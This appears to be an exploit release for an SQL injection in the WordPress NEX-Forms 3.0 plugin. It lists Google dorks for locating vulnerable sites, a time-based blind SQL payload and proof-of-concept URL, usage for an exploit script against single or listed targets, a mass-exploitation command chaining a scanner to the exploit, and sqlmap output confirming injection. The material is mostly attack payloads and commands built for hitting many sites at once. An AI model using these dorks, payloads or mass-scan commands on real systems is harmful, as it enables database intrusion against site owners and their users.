The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
[ I N U R L - B R A S I L ] - [ By GoogleINURL ]
-----------------------------------------------------------------------------
# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
- Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani
-----------------------------------------------------------------------------
- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENTOR: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google: inurl:nex-forms-express-wp-form-builder
- Dork Google: index of nex-forms-express-wp-form-builde
- GET VULN: nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
-----------------------------------------------------------------------------
- DBMS: 'MySQL'
- Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
-----------------------------------------------------------------------------
Info: The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
-----------------------------------------------------------------------------
- --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
-----------------------------------------------------------------------------
- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND:
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"
- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
-----------------------------------------------------------------------------
[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability
OUTPUT PRINT:
OUTPUT SQLMAP:
[03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[03:25:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: PHP 5.4.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12